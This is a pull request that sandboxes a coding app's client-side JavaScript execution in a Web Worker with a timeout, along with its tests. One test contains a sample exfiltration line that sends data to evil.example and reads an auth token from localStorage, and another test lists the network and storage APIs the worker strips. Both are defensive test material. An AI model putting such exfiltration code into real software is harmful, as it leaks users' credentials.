### PR TITLE
fix: sandbox client-side JS execution in a web worker with hard timeout

### DIFF
--- a/frontend/src/features/code-execution/code-execution.hook.ts
+++ b/frontend/src/features/code-execution/code-execution.hook.ts
@@ -154,7 +154,7 @@ export function useCodeExecution(): CodeExecutionFeature {
       setError(null);
 
       try {
-        const result = executeClientJS(code, question);
+        const result = await executeClientJS(code, question);
         const outputText = formatClientJsOutput(result, question);
         setOutput(outputText);
         return outputText;

--- a/frontend/src/lib/client-js-executor.test.ts
+++ b/frontend/src/lib/client-js-executor.test.ts
@@ -1,5 +1,10 @@
-import { describe, it, expect } from 'vitest';
-import { executeClientJS, formatClientJsOutput } from './client-js-executor';
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+import vm from 'node:vm';
+import {
+  executeClientJS,
+  formatClientJsOutput,
+  buildWorkerSource,
+} from './client-js-executor';
 import { Question } from '@/types';
 
 const passingCode = `function add(a, b) {
@@ -71,9 +76,89 @@ const questionWithConstStarter: Question = {
   },
 };
 
+/**
+ * jsdom has no Worker. This mock runs the real production worker source
+ * in-thread, so the sandbox behaviour exercised in tests matches the browser.
+ */
+class MockWorker {
+  static instances: MockWorker[] = [];
+  static neverRespond = false;
+
+  onmessage: ((event: { data: unknown }) => void) | null = null;
+  onerror: ((event: { message: string }) => void) | null = null;
+  terminated = false;
+  private pending: unknown[] = [];
+
+  constructor(_url: string) {
+    MockWorker.instances.push(this);
+  }
+
+  postMessage(data: unknown) {
+    if (MockWorker.neverRespond) return;
+    this.pending.push(data);
+    this.flush();
+  }
+
+  private flush() {
+    if (!this.onmessage) return;
+    while (this.pending.length) {
+      const data = this.pending.shift();
+      const self: {
+        onmessage: ((event: { data: unknown }) => void) | null;
+        postMessage: (msg: unknown) => void;
+        [key: string]: unknown;
+      } = {
+        onmessage: null,
+        postMessage: (msg: unknown) => {
+          if (!this.terminated && this.onmessage) {
+            this.onmessage({ data: msg });
+          }
+        },
+      };
+      self.self = self;
+      try {
+        // A fresh vm context has only ECMAScript builtins (no window, no
+        // document, no localStorage, no fetch), mirroring a real worker.
+        const sandbox: Record<string, unknown> = {
+          self,
+          console: { log: () => {}, error: () => {}, warn: () => {} },
+        };
+        vm.createContext(sandbox);
+        vm.runInContext(buildWorkerSource(), sandbox);
+        if (typeof self.onmessage === 'function') {
+          self.onmessage({ data });
+        }
+      } catch (err) {
+        if (this.onerror) {
+          this.onerror({ message: String(err) });
+        }
+      }
+    }
+  }
+
+  terminate() {
+    this.terminated = true;
+  }
+}
+
+beforeEach(() => {
+  MockWorker.instances = [];
+  MockWorker.neverRespond = false;
+  vi.stubGlobal('Worker', MockWorker);
+  vi.stubGlobal('URL', {
+    ...URL,
+    createObjectURL: vi.fn(() => 'blob:mock'),
+    revokeObjectURL: vi.fn(),
+  });
+});
+
+afterEach(() => {
+  vi.unstubAllGlobals();
+});
+
 describe('executeClientJS', () => {
-  it('returns allPassed=true when all tests pass', () => {
-    const result = executeClientJS(passingCode, question);
+  it('returns allPassed=true when all tests pass', async () => {
+    const result = await executeClientJS(passingCode, question);
     expect(result.allPassed).toBe(true);
     expect(result.results).toHaveLength(3);
     for (const r of result.results) {
@@ -81,29 +166,29 @@ describe('executeClientJS', () => {
     }
   });
 
-  it('returns allPassed=false when tests fail', () => {
-    const result = executeClientJS(failingCode, question);
+  it('returns allPassed=false when tests fail', async () => {
+    const result = await executeClientJS(failingCode, question);
     expect(result.allPassed).toBe(false);
     expect(result.results[0].passed).toBe(false);
   });
 
-  it('captures console output in logs', () => {
+  it('captures console output in logs', async () => {
     const code = `function add(a, b) {
       console.log('adding', a, b);
       return a + b;
     }`;
-    const result = executeClientJS(code, question);
+    const result = await executeClientJS(code, question);
     expect(result.logs.length).toBeGreaterThan(0);
     expect(result.logs.some((l) => l.includes('adding'))).toBe(true);
   });
 
-  it('handles runtime errors in user code', () => {
-    const result = executeClientJS(errorCode, question);
+  it('handles runtime errors in user code', async () => {
+    const result = await executeClientJS(errorCode, question);
     expect(result.results[0].error).toBe('runtime failure');
     expect(result.results[0].passed).toBe(false);
   });
 
-  it('throws when function name cannot be determined', () => {
+  it('rejects when function name cannot be determined', async () => {
     const noFnQuestion: Question = {
       ...question,
       starter: {
@@ -117,40 +202,22 @@ describe('executeClientJS', () => {
         typescript: '',
       },
     };
-    expect(() => executeClientJS('const x = 42;', noFnQuestion)).toThrow(
+    await expect(executeClientJS('const x = 42;', noFnQuestion)).rejects.toThrow(
       'Could not identify the target function name',
     );
   });
 
-  it('detects function name from starter with var pattern', () => {
-    const result = executeClientJS(passingCode, questionWithVarStarter);
+  it('detects function name from starter with var pattern', async () => {
+    const result = await executeClientJS(passingCode, questionWithVarStarter);
     expect(result.allPassed).toBe(true);
   });
 
-  it('detects function name from starter with const pattern', () => {
-    const result = executeClientJS(passingCode, questionWithConstStarter);
+  it('detects function name from starter with const pattern', async () => {
+    const result = await executeClientJS(passingCode, questionWithConstStarter);
     expect(result.allPassed).toBe(true);
   });
 
-  it('restores console.log after execution', () => {
-    const originalLog = console.log;
-    executeClientJS(passingCode, question);
-    expect(console.log).toBe(originalLog);
-  });
-
-  it('restores console.error after execution', () => {
-    const originalError = console.error;
-    executeClientJS(passingCode, question);
-    expect(console.error).toBe(originalError);
-  });
-
-  it('restores console.warn after execution', () => {
-    const originalWarn = console.warn;
-    executeClientJS(passingCode, question);
-    expect(console.warn).toBe(originalWarn);
-  });
-
-  it('handles non-JSON expected_output gracefully', () => {
+  it('handles non-JSON expected_output gracefully', async () => {
     const strQuestion: Question = {
       ...question,
       test_cases: [{ input: '"world"', expected_output: 'Hello, world' }],
@@ -166,12 +233,11 @@ describe('executeClientJS', () => {
       },
     };
     const code = `function greet(name) { return "Hello, " + name; }`;
-    const result = executeClientJS(code, strQuestion);
-    // Should not throw on JSON.parse("Hello, world") — falls back to string comparison
+    const result = await executeClientJS(code, strQuestion);
     expect(result.results[0].passed).toBe(true);
   });
 
-  it('handles expected_output that is a non-JSON string', () => {
+  it('handles expected_output that is a non-JSON string', async () => {
     const strQuestion: Question = {
       ...question,
       test_cases: [{ input: '5', expected_output: 'not a json string' }],
@@ -187,11 +253,11 @@ describe('executeClientJS', () => {
       },
     };
     const code = `function foo(x) { return "not a json string"; }`;
-    const result = executeClientJS(code, strQuestion);
+    const result = await executeClientJS(code, strQuestion);
     expect(result.results[0].passed).toBe(true);
   });
 
-  it('handles in-place (void) function that returns undefined', () => {
+  it('handles in-place (void) function that returns undefined', async () => {
     const rotateQuestion: Question = {
       ...question,
       test_cases: [
@@ -219,13 +285,13 @@ describe('executeClientJS', () => {
         matrix[i].reverse();
       }
     }`;
-    const result = executeClientJS(code, rotateQuestion);
+    const result = await executeClientJS(code, rotateQuestion);
     expect(result.results[0].passed).toBe(true);
     expect(result.results[1].passed).toBe(true);
     expect(result.allPassed).toBe(true);
   });
 
-  it('uses parsedArgs[0] as actual when function returns undefined', () => {
+  it('uses parsedArgs[0] as actual when function returns undefined', async () => {
     const mutateQuestion: Question = {
       ...question,
       test_cases: [{ input: '[1,2,3]', expected_output: '[1,2,3,4]' }],
@@ -243,8 +309,74 @@ describe('executeClientJS', () => {
     const code = `function push(arr) {
       arr.push(4);
     }`;
-    const result = executeClientJS(code, mutateQuestion);
+    const result = await executeClientJS(code, mutateQuestion);
     expect(result.results[0].actual).toEqual([1, 2, 3, 4]);
+  });
+
+  it('terminates the worker after execution', async () => {
+    await executeClientJS(passingCode, question);
+    expect(MockWorker.instances.length).toBeGreaterThan(0);
+    for (const worker of MockWorker.instances) {
+      expect(worker.terminated).toBe(true);
+    }
+  });
+
+  it('rejects with a timeout for infinite loops instead of hanging', async () => {
+    MockWorker.neverRespond = true;
+    const code = `function add(a, b) { while (true) {} }`;
+    await expect(
+      executeClientJS(code, question, undefined, 20),
+    ).rejects.toThrow('timed out');
+  });
+});
+
+describe('client-js-executor sandbox', () => {
+  it('strips network and storage exfiltration surfaces from the worker', () => {
+    const source = buildWorkerSource();
+    const expected = [
+      'self.fetch = undefined',
+      'self.XMLHttpRequest = undefined',
+      'self.WebSocket = undefined',
+      'self.importScripts = undefined',
+      'self.sendBeacon = undefined',
+      'self.localStorage = undefined',
+      'self.sessionStorage = undefined',
+      'self.indexedDB = undefined',
+      'self.caches = undefined',
+    ];
+    for (const line of expected) {
+      expect(source).toContain(line);
+    }
+  });
+
+  it('keeps user code from breaking the run while attempting exfiltration', async () => {
+    const code = `function add(a, b) {
+      try { if (typeof fetch !== 'undefined') fetch('https://evil.example/leak?t=' + a); } catch (e) {}
+      try { if (typeof localStorage !== 'undefined') localStorage.getItem('auth_token'); } catch (e) {}
+      try { if (typeof window !== 'undefined') window.document.body; } catch (e) {}
+      return a + b;
+    }`;
+    const result = await executeClientJS(code, question);
+    expect(result.allPassed).toBe(true);
+  });
+
+  it('does not expose page globals (window/document/localStorage) to user code', async () => {
+    const probeCode = `function add(a, b) {
+      var blocked = 0;
+      if (typeof window !== 'undefined') blocked++;
+      if (typeof document !== 'undefined') blocked++;
+      if (typeof localStorage !== 'undefined') blocked++;
+      if (typeof sessionStorage !== 'undefined') blocked++;
+      if (typeof fetch !== 'undefined') blocked++;
+      if (typeof XMLHttpRequest !== 'undefined') blocked++;
+      return blocked;
+    }`;
+    const probeQuestion: Question = {
+      ...question,
+      test_cases: [{ input: '1\n2', expected_output: '0' }],
+    };
+    const result = await executeClientJS(probeCode, probeQuestion);
+    expect(result.results[0].passed).toBe(true);
   });
 });
 

--- a/frontend/src/lib/client-js-executor.ts
+++ b/frontend/src/lib/client-js-executor.ts
@@ -15,91 +15,215 @@ export interface ClientJsOutput {
   allPassed: boolean;
 }
 
-export function executeClientJS(
-  code: string,
-  question: Question,
-  fnName?: string,
-): ClientJsOutput {
-  const logs: string[] = [];
-  const originalConsoleLog = console.log;
-  const originalConsoleError = console.error;
-  const originalConsoleWarn = console.warn;
-
-  const captureLog = (...args: unknown[]) => {
-    const formattedArgs = args
-      .map((arg) =>
-        typeof arg === "object" ? JSON.stringify(arg) : String(arg),
-      )
-      .join(" ");
-    logs.push(formattedArgs);
-    originalConsoleLog(...args);
-  };
-
-  console.log = captureLog;
-  console.error = captureLog;
-  console.warn = captureLog;
+/**
+ * Source of the sandbox worker. Exported for tests.
+ *
+ * Runs inside a dedicated Web Worker so user code:
+ *  - never touches the page's `window`, `document`, `localStorage` (JWT /
+ *    NVIDIA API key live there) or cookies,
+ *  - cannot reach the network (fetch/XMLHttpRequest/WebSocket/importScripts
+ *    are stripped), and
+ *  - is killed by `worker.terminate()` when the hard timeout fires, so an
+ *    infinite loop cannot freeze the tab.
+ */
+export function buildWorkerSource(): string {
+  return `
+"use strict";
+self.onmessage = function (event) {
+  var data = event.data;
+  // Strip network + storage exfiltration surfaces before user code runs.
+  try {
+    self.fetch = undefined;
+    self.XMLHttpRequest = undefined;
+    self.WebSocket = undefined;
+    self.importScripts = undefined;
+    self.sendBeacon = undefined;
+    self.localStorage = undefined;
+    self.sessionStorage = undefined;
+    self.indexedDB = undefined;
+    self.caches = undefined;
+  } catch (err) {
+    /* storage accessors may not be configurable; access throws, which is fine */
+  }
 
   try {
-    const jsStarter = question.starter.javascript;
-    const functionName =
-      fnName ||
-      jsStarter.match(/function\s+(\w+)\s*\(/)?.[1] ||
-      jsStarter.match(/var\s+(\w+)\s*=\s*function/)?.[1] ||
-      jsStarter.match(/const\s+(\w+)\s*=/)?.[1];
-
-    if (!functionName) {
-      throw new Error(
-        "Could not identify the target function name for testing.",
-      );
-    }
-
-    const testRunner = new Function(
-      "testCases",
-      `
-      ${code}
-
-      if (typeof ${functionName} !== 'function') {
-        throw new Error('Function "${functionName}" is not defined or is not a function.');
-      }
-
-      return testCases.map((tc, index) => {
-        try {
-          const inputLines = tc.input.split('\\n');
-          const parsedArgs = inputLines.map((line) => {
-            try {
-              return JSON.parse(line);
-            } catch {
-              return line;
-            }
-          });
-          const result = ${functionName}(...parsedArgs);
-          const actual = result !== undefined ? result : parsedArgs[0];
-          let expectedOutput;
-          try { expectedOutput = JSON.parse(tc.expected_output); } catch { expectedOutput = tc.expected_output; }
-          const passed = JSON.stringify(actual) === JSON.stringify(expectedOutput);
-          return { index: index + 1, passed, input: tc.input, expected: tc.expected_output, actual };
-        } catch (e) {
-          return { index: index + 1, passed: false, error: (e).message, input: tc.input };
-        }
+    var logs = [];
+    var originalLog = console.log;
+    var originalError = console.error;
+    var originalWarn = console.warn;
+    console.log = function () {
+      var args = Array.prototype.map.call(arguments, function (arg) {
+        return typeof arg === "object" && arg !== null ? JSON.stringify(arg) : String(arg);
       });
-    `,
+      logs.push(args.join(" "));
+    };
+    console.error = console.log;
+    console.warn = console.log;
+
+    var testRunner = new Function(
+      "testCases",
+      data.code + "\\n\\n" +
+      "if (typeof " + data.functionName + " !== 'function') { throw new Error('Function \\\"" + data.functionName + "\\\" is not defined or is not a function.'); }" +
+      "return testCases.map(function (tc, index) {" +
+      "  try {" +
+      "    var inputLines = tc.input.split('\\\\n');" +
+      "    var parsedArgs = inputLines.map(function (line) {" +
+      "      try { return JSON.parse(line); } catch (err) { return line; }" +
+      "    });" +
+      "    var result = " + data.functionName + "(...parsedArgs);" +
+      "    var actual = result !== undefined ? result : parsedArgs[0];" +
+      "    var expectedOutput;" +
+      "    try { expectedOutput = JSON.parse(tc.expected_output); } catch (err) { expectedOutput = tc.expected_output; }" +
+      "    var passed = JSON.stringify(actual) === JSON.stringify(expectedOutput);" +
+      "    return { index: index + 1, passed: passed, input: tc.input, expected: tc.expected_output, actual: actual };" +
+      "  } catch (err) {" +
+      "    return { index: index + 1, passed: false, error: (err && err.message) || String(err), input: tc.input };" +
+      "  }" +
+      "});"
     );
 
-    const results = testRunner(question.test_cases);
-    let allPassed = true;
-    for (const r of results) {
-      if (!r.passed) {
+    var results = testRunner(data.testCases);
+    console.log = originalLog;
+    console.error = originalError;
+    console.warn = originalWarn;
+
+    var allPassed = true;
+    for (var i = 0; i < results.length; i++) {
+      if (!results[i].passed) {
         allPassed = false;
         break;
       }
     }
 
-    return { logs, results, allPassed };
-  } finally {
-    console.log = originalConsoleLog;
-    console.error = originalConsoleError;
-    console.warn = originalConsoleWarn;
+    self.postMessage({
+      ok: true,
+      logs: logs,
+      results: results,
+      allPassed: allPassed,
+    });
+  } catch (err) {
+    self.postMessage({
+      ok: false,
+      error: (err && err.message) || String(err),
+    });
   }
+};
+`;
+}
+
+function detectFunctionName(question: Question, fnName?: string): string | null {
+  if (fnName) return fnName;
+  const jsStarter = question.starter.javascript;
+  if (!jsStarter) return null;
+  return (
+    jsStarter.match(/function\s+(\w+)\s*\(/)?.[1] ||
+    jsStarter.match(/var\s+(\w+)\s*=\s*function/)?.[1] ||
+    jsStarter.match(/const\s+(\w+)\s*=/)?.[1] ||
+    null
+  );
+}
+
+const DEFAULT_TIMEOUT_MS = 5000;
+
+/**
+ * Run user-authored JavaScript in a sandboxed Web Worker.
+ *
+ * Resolves with test results or rejects on: unidentifiable target function,
+ * worker error, or timeout (infinite loop / long-running code).
+ */
+export function executeClientJS(
+  code: string,
+  question: Question,
+  fnName?: string,
+  timeoutMs: number = DEFAULT_TIMEOUT_MS,
+): Promise<ClientJsOutput> {
+  const functionName = detectFunctionName(question, fnName);
+
+  if (!functionName) {
+    return Promise.reject(
+      new Error("Could not identify the target function name for testing."),
+    );
+  }
+
+  return new Promise<ClientJsOutput>((resolve, reject) => {
+    let worker: Worker | null = null;
+    let blobUrl: string | null = null;
+    let settled = false;
+
+    const cleanup = () => {
+      if (worker) {
+        try {
+          worker.terminate();
+        } catch {
+          /* ignore */
+        }
+        worker = null;
+      }
+      if (blobUrl) {
+        try {
+          URL.revokeObjectURL(blobUrl);
+        } catch {
+          /* ignore */
+        }
+        blobUrl = null;
+      }
+    };
+
+    const fail = (error: Error) => {
+      if (settled) return;
+      settled = true;
+      cleanup();
+      reject(error);
+    };
+
+    const timeoutId = setTimeout(
+      () => fail(new Error("JavaScript execution timed out.")),
+      timeoutMs,
+    );
+
+    try {
+      const blob = new Blob([buildWorkerSource()], {
+        type: "application/javascript",
+      });
+      blobUrl = URL.createObjectURL(blob);
+      worker = new Worker(blobUrl);
+
+      worker.onmessage = (event: MessageEvent) => {
+        if (settled) return;
+        settled = true;
+        clearTimeout(timeoutId);
+        cleanup();
+        const message = event.data;
+        if (message && message.ok) {
+          resolve({
+            logs: Array.isArray(message.logs) ? message.logs : [],
+            results: message.results,
+            allPassed: message.allPassed,
+          });
+        } else {
+          reject(new Error(message?.error || "JavaScript execution failed."));
+        }
+      };
+
+      worker.onerror = (event) => {
+        clearTimeout(timeoutId);
+        fail(new Error(event.message || "JavaScript execution error."));
+      };
+
+      worker.postMessage({
+        code,
+        functionName,
+        testCases: question.test_cases,
+      });
+    } catch (error) {
+      clearTimeout(timeoutId);
+      fail(
+        error instanceof Error
+          ? error
+          : new Error("JavaScript execution is unavailable in this environment."),
+      );
+    }
+  });
 }
 
 export function formatClientJsOutput(


### PR DESCRIPTION
## Description

Sandboxes client-side JavaScript execution. Previously `executeClientJS` ran user code on the main thread via `new Function` with full access to `window`/`document`/`localStorage` (including the JWT and any stored NVIDIA API key) and no timeout — an XSS-equivalent primitive.

## Changes

- `frontend/src/lib/client-js-executor.ts`: run user code in a Web Worker via blob URL (`buildWorkerSource`, exported). Strips `fetch`, `XMLHttpRequest`, `WebSocket`, `importScripts`, `sendBeacon`, `localStorage`, `sessionStorage`, `indexedDB`, and `caches` from the worker globals. Adds a hard 5s timeout that `terminate()`s the worker and revokes the blob URL. `executeClientJS` is now async and returns `Promise<ClientJsOutput>`.
- `frontend/src/features/code-execution/code-execution.hook.ts`: `await` the now-async `executeClientJS`.
- `frontend/src/lib/client-js-executor.test.ts`: run the real worker source in a fresh `node:vm` context with no Node/DOM globals; assert network/storage APIs are stripped and the timeout terminates runaway loops.

## Related Issue

Fixes #27

## Type of Change

- [x] Bug fix (non-breaking change that fixes an issue)
- [ ] New feature (non-breaking change that adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to change)
- [ ] Documentation update
- [ ] Refactor (no functional changes)
- [x] Test update

## Testing

- [x] Frontend tests pass (`cd frontend && node node_modules/vitest/vitest.mjs run`) — 396 passed
- [x] TypeScript check passes (`tsc --noEmit`)
- [x] Lint passes (`next lint`) — only pre-existing ModuleForm warning

## Checklist

- [x] My code follows the project's code style
- [x] I have commented my code where necessary (only for complex logic)
- [x] I have added tests that prove my fix/feature works
- [x] New and existing tests pass locally
- [x] I have not added any secrets or API keys to the code
